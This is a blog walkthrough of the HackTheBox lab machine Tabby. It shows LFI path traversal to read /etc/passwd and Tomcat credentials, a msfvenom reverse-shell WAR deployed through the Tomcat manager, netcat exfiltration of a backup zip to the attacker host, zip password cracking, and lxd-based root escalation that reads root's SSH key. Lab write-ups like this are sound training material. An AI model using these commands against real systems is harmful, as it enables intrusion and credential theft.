SecWalk.com

HTB Walkthrough Tabby 10.10.10.194

Summary

Tabby is launched on the 20th of June and is rated as an Easy Box.

Foothold

Nmap shows there are only 3 ports open, 22,80,8080. on port 80 we see a webpage that is vulnerable to LFI

User

After finding the LFI and the right file we get credentials for the tomcat server which is running on port 8080. we were able to obtain a shell with metasploit. After some enumeration we found a zip file. after successfully brute forcing the password we were able to switch to the user ash and get the user flag.

Root

Ash id is member of the lxd group which we can use to get root privileges.

Enumeration

Nmap

nmap -sC -sV 10.10.10.194

Web

We are getting a page when we visit http://10.10.10.194. it also leaks a hostname and e-mailadres

adding hostname to my host file

When we visit the page again with DNS name we get the same page

In the background I start gobuster to see if there are any other interesting files or directory’s

gobuster dir -u http://megahosting.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php

When we click on the news link we get an page not found but the link looks interesting:

http://megahosting.htb/news.php?file=statement

This link looks like there could be an LFI (local file inclusion)

Let’s investigate this with burp:

When we visit this page we keep getting unknown host, first I thought there was an brute force detection and cause using gobuster it might have locked me out but after some investigation it turns out that was not the case

when we change the host to 10.10.10.194 we get a page

Now it’s time to see if there is any LFI

change the request to GET /news.php?file=/../../../../../../../../../etc/passwd

Now it’s time to see if we can find any interesting files

When we look at http://10.10.10.194:8080/ we see there is tomcat installed and there is a way to authenticate. so with this knowledge I start searching for tomcat files which could give me these credentials.

on the tomcat page they mention already a few locations:

/var/lib/tomcat9/webapps/ROOT/index.html

/usr/share/tomcat9

/var/lib/tomcat9

/usr/share/doc/tomcat9-common/RUNNING.txt.gz

/etc/tomcat9/tomcat-users.xml

The last one doesn’t exist which is a bit odd.

since /usr/share/tomcat9 is the home folder i tried if the etc folder did exist and it did!:

GET /news.php?file=/../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

Also this page shows this is a default locations:

https://packages.debian.org/sid/all/tomcat9/filelist

We found some credentials for tomcat

tomcat:$3cureP4s5w0rd123!

we cannot login to: http://10.10.10.194:8080/manager/html

but there is a second one http://10.10.10.194:8080/host-manager/

and we are logged in:

normally we can upload now a war file and get a shell but we cannot do that this time.

Method 1 Shell with Metasploit:

There is a Metasploit module we could try to get a shell:

msfconsole

use exploit/multi/http/tomcat_mgr_deploy

setting options:

after running we obtained our shell:

Method 2 Shell With Curl:

First we need to create a malicious war file we can do this with msvenom:

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=81 -f war -o secwalk.war

Run listener:

msfconsole -x “use exploit/multi/handler; set PAYLOAD java/meterpreter/reverse_tcp; set LHOST 10.10.14.10; set LPORT 81; run”

curl command to upload war file:

curl -T secwalk.war http://tomcat:\$3cureP4s5w0rd123\!@10.10.10.194:8080/manager/text/deploy?path=/secwalk&update=true


visit: http://10.10.10.194:8080/secwalk

and we have our shell:

Getting other user:

after looking around we find a zip file named 16162020_backup.zip

transfer file to my machine:

on victim machine: nc -w 3 10.10.14.4 81 < 16162020_backup.zip

on my machine: nc -l -p 81 > 16162020_backup.zip

after trying unzipping it is password protected. i used fcrackzip to bruteforce the password:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u 16162020_backup.zip

password found:

admin@it

unzip 16162020_backup.zip

files didn’t contain any interesting stuff so lets try if this works for the user ash:

We got our user shell:

Privilege escalation

id command shows ash is a member of the lxd group

it could be vulnerable to this so let’s try out:

source:https://www.hackingarticles.in/lxd-privilege-escalation/

git clone https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder/

./build-alpine

python -m SimpleHTTPServer 80

on target machine:

wget http://10.10.14.4/alpine-v3.12-x86_64-20200621_0657.tar.gz

lxc image import alpine-v3.12-x86_64-20200621_0657.tar.gz –alias secwalk

lxc init secwalk ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/secwalk/ recursive=true

lxc start ignite

lxc exec ignite /bin/sh

This image has an empty alt attribute; its file name is image-161.png

cd /mount/secwalk

cat /root/.ssh/id_rsa

chmod 600 id_rsa

ssh -i id_rsa root@10.10.10.194

and we successfully rooted this machine

Made by S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply